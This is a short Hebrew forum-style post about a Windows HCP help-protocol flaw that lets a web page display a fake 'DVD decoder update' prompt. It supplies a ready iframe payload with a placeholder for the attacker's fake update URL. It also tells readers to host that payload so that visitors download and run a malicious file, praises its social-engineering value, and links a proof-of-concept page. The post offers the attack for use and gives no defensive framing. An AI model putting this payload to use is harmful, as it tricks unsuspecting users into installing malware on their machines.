(ראיתי בחדשות של BInaryVision את החדשה הזאת- תודה).
הפרוטוקול HCP זה פרוטוקול עזרה שנמצא על המערכת וינדוס.
הבאג נמצא בבדיקה של "מאיפה יורד אעידכון" ובגלל שפשוט אין בדיקה כזאת, אפשר לזייף עידכון ולגרום לבעל המחשב להוריד אותו ולהריץ (זה מאוד יכול לעזור להנדסה חברתית, כי זה ניראה מאוד אמיתי).
פשוט תיצרו עמוד HTML עם הקוד הזה בתוכו:
<iframe
[src="HCP://system/DVDUpgrd/dvdupgrd.htm?website=[File"
width="1" height="1">
</iframe
(את ה[File] תשנו לכתובת של הזיוף של העידכון).
זהו, עכשיו כל מי שיכנס אליו זה יקפיץ לו הודעה בוינדוס של "יש עידכון חדש לDVD Decoder ובלה בלה בלה"
וכשהוא ילחץ על "הורד" זה יוריד לו את העידכון והוא יחשוב שזה מוריד עידכון אמיתי, ככה גם הוא יותר יאמין ויתפתה ללחוץ עליו, ככה שאפשר להכין קובץ זדוני ולעשות חגיגה.
למי שרוצה לנסות את זה:
http://exploitlabs.com/msnspoof/poc/index2.html
תהנו.
הקרדיט מגיע לDonnie Werner מISS.